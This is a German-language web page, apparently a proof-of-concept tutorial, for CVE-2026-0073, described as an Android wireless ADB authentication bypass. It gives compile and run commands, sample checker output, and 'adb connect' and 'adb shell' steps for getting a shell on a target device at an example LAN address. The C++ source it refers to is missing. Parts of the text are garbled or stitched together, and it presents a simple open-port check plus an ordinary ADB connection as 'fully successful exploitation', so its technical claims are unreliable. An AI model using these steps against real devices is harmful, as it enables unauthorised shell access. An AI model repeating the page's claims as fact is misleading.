
CVE-2026-0073
CVE-2026-0073 ist eine kritische Schwachstelle zur Authentifizierungsumgehung im Wireless-ADB-Dienst von Android (adbd-Daemon).
Ein Angreifer im selben Netzwerk kann die gegenseitige TLS-Authentifizierung umgehen und sich ohne Benutzerfreigabe oder vorheriges Pairing mit dem Gerät verbinden.
| Punkt | Details |
|---|---|
| CVE-ID | CVE-2026-0073 |
| Schweregrad | Kritisch |
| CVSS-Score | 8.8 |
| Betroffene Komponente | adbd (Android Debug Bridge) - TLS-Handler |
| Typ | Authentifizierungsumgehung |
| Auswirkung | Remote-Shell-Zugriff (shell-Benutzer) |
| Behoben in | Android-Sicherheitsbulletin Mai 2026 |
Behoben in: Sicherheitspatch-Level 2026-05-01 und höher.
shell-Benutzer ausführenadbd_tls_verify_cert()Der Fehler tritt auf, weil die Datei CVE-2026-0073-Checker.cpp noch nicht existiert.
nano CVE-2026-0073-Checker.cpp
Kopieren und fügen Sie den vollständigen Code unten in den Editor ein:
Speichern und beenden (Ctrl + X → Y → Enter)
Kompilieren Sie erneut:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Genau das sehen Sie, wenn das C++-Programm auf einem verwundbaren Android-Gerät erfolgreich funktioniert:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN in Grün → Der ADB-Port lauscht.Führen Sie diese Befehle aus:
adb connect 192.168.1.105:5555
Wenn Folgendes angezeigt wird:
connected to 192.168.1.105:5555
Geben Sie dann ein:
adb shell
Sie sollten sich dann im Gerät befinden:
pixel8:/ $
Das ist eine vollständig erfolgreiche Ausnutzung.
Dieser PoC dient nur zu Bildungs- und autorisierten Testzwecken.
Sie dürfen dieses Tool nur auf Geräten verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben. Unbefugte Nutzung ist illegal und strengstens untersagt.
Nutzung auf eigene Gefahr. Der Autor übernimmt keine Verantwortung für Schäden oder rechtliche Konsequenzen.
🎯 Mit Vorsicht erstellt — Nur auf autorisierten Geräten verwenden.